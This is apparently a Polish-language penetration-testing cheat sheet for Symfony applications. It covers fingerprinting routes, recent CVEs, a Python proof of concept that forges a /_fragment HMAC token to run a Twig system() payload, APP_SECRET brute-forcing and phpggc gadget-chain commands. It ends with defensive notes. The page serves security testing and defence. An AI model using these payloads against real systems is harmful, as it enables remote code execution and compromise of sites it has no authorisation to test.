Symfony

Reading time: 6 minutes

Symfony jest jednym z najczęściej używanych frameworków PHP i regularnie pojawia się w ocenach celów przedsiębiorstw, e-commerce i CMS (Drupal, Shopware, Ibexa, OroCRM … wszystkie zawierają komponenty Symfony). Ta strona zbiera ofensywne wskazówki, powszechne błędy konfiguracyjne i ostatnie luki, które powinny znaleźć się na twojej liście kontrolnej, gdy odkryjesz aplikację Symfony.

Uwaga historyczna: Duża część ekosystemu nadal działa na gałęzi 5.4 LTS (EOL listopad 2025). Zawsze weryfikuj dokładną wersję minor, ponieważ wiele poradników dotyczących bezpieczeństwa z lat 2023-2025 naprawiono tylko w wydaniach poprawek (np. 5.4.46 → 5.4.50).

Recon & Enumeration

Finger-printing

• Nagłówki odpowiedzi HTTP: X-Powered-By: Symfony, X-Debug-Token, X-Debug-Token-Link lub ciasteczka zaczynające się od sf_redirect, sf_session, MOCKSESSID.
• Wycieki kodu źródłowego (composer.json, composer.lock, /vendor/…) często ujawniają dokładną wersję:

curl -s https://target/vendor/composer/installed.json | jq '.[] | select(.name|test("symfony/")) | .name,.version'

• Publiczne trasy, które istnieją tylko w Symfony:
• /_profiler (Symfony Profiler & debug toolbar)
• /_wdt/<token> (“Web Debug Toolbar”)
• /_error/{code}.{_format} (ładne strony błędów)
• /app_dev.php, /config.php, /config_dev.php (pre-4.0 dev front-controllers)
• Wappalyzer, BuiltWith lub listy słów ffuf/feroxbuster: symfony.txt → szukaj /_fragment, /_profiler, .env, .htaccess.

Interesujące pliki i punkty końcowe

Wysokiego wpływu luki (2023-2025)

1. Ujawnienie APP_SECRET ➜ RCE przez /_fragment (znane jako “secret-fragment”)

• CVE-2019-18889 pierwotnie, ale nadal pojawia się na nowoczesnych celach, gdy debug jest włączony lub .env jest ujawnione.
• Gdy znasz 32-znakowy APP_SECRET, stwórz token HMAC i nadużyj wewnętrznego kontrolera render(), aby wykonać dowolny Twig:

# PoC – wymaga sekretu
import hmac, hashlib, requests, urllib.parse as u
secret = bytes.fromhex('deadbeef…')
payload = "{{['id']|filter('system')}}"   # RCE w Twig
query = {
'template': '@app/404.html.twig',
'filter': 'raw',
'_format': 'html',
'_locale': 'en',
'globals[cmd]': 'id'
}
qs = u.urlencode(query, doseq=True)
token = hmac.new(secret, qs.encode(), hashlib.sha256).hexdigest()
r = requests.get(f"https://target/_fragment?{qs}&_token={token}")
print(r.text)

• Doskonały artykuł i skrypt do eksploatacji: blog Ambionics (link w Referencjach).

2. Windows Process Hijack – CVE-2024-51736

• Komponent Process przeszukiwał bieżący katalog roboczy przed PATH w systemie Windows. Atakujący, który może przesłać tar.exe, cmd.exe itp. do zapisywalnego web-root i wywołać Process (np. ekstrakcja plików, generowanie PDF) zyskuje możliwość wykonania poleceń.
• Naprawione w 5.4.50, 6.4.14, 7.1.7.

3. Session-Fixation – CVE-2023-46733

• Guard uwierzytelniający ponownie używał istniejącego identyfikatora sesji po zalogowaniu. Jeśli atakujący ustawi ciasteczko przed uwierzytelnieniem ofiary, przejmuje konto po zalogowaniu.

4. Twig sandbox XSS – CVE-2023-46734

• W aplikacjach, które ujawniają szablony kontrolowane przez użytkowników (admin CMS, kreator e-maili), filtr nl2br mógł być nadużyty do obejścia sandboxa i wstrzyknięcia JS.

5. Symfony 1 gadget chains (nadal znalezione w aplikacjach legacy)

• phpggc symfony/1 system id produkuje ładunek Phar, który wywołuje RCE, gdy następuje unserialize() na klasach takich jak sfNamespacedParameterHolder. Sprawdź punkty końcowe przesyłania plików i opakowania phar://.

PHP - Deserialization + Autoload Classes

Arkusz oszustw eksploatacyjnych

Oblicz token HMAC dla /_fragment

python - <<'PY'
import sys, hmac, hashlib, urllib.parse as u
secret = bytes.fromhex(sys.argv[1])
qs     = u.quote_plus(sys.argv[2], safe='=&')
print(hmac.new(secret, qs.encode(), hashlib.sha256).hexdigest())
PY deadbeef… "template=@App/evil&filter=raw&_format=html"

Bruteforce słabego APP_SECRET

cewl -d3 https://target -w words.txt
symfony-secret-bruteforce.py -w words.txt -c abcdef1234567890 https://target

RCE poprzez wystawiony Symfony Console

Jeśli bin/console jest dostępny przez php-fpm lub bezpośredni upload CLI:

php bin/console about        # confirm it works
php bin/console cache:clear --no-warmup

Użyj gadżetów deserializacji w katalogu pamięci podręcznej lub napisz złośliwy szablon Twig, który zostanie wykonany przy następnym żądaniu.

Uwagi defensywne

1. Nigdy nie wdrażaj debugowania (APP_ENV=dev, APP_DEBUG=1) na produkcji; zablokuj /app_dev.php, /_profiler, /_wdt w konfiguracji serwera webowego.
2. Przechowuj sekrety w zmiennych środowiskowych lub vault/secrets.local.php, nigdy w plikach dostępnych przez katalog główny dokumentów.
3. Wymuszaj zarządzanie łatkami – subskrybuj powiadomienia o bezpieczeństwie Symfony i utrzymuj przynajmniej poziom łatki LTS.
4. Jeśli działasz na Windows, natychmiast zaktualizuj, aby złagodzić CVE-2024-51736 lub dodaj obronę w głębokości open_basedir/disable_functions.

Przydatne narzędzia ofensywne

• ambionics/symfony-exploits – zdalne wykonanie kodu z fragmentem sekretnym, odkrywanie tras debugera.
• phpggc – gotowe łańcuchy gadżetów dla Symfony 1 i 2.
• sf-encoder – mały pomocnik do obliczania HMAC _fragment (implementacja w Go).

Odniesienia

• Ambionics – Symfony “secret-fragment” Remote Code Execution
• Symfony Security Advisory – CVE-2024-51736: Command Execution Hijack on Windows Process Component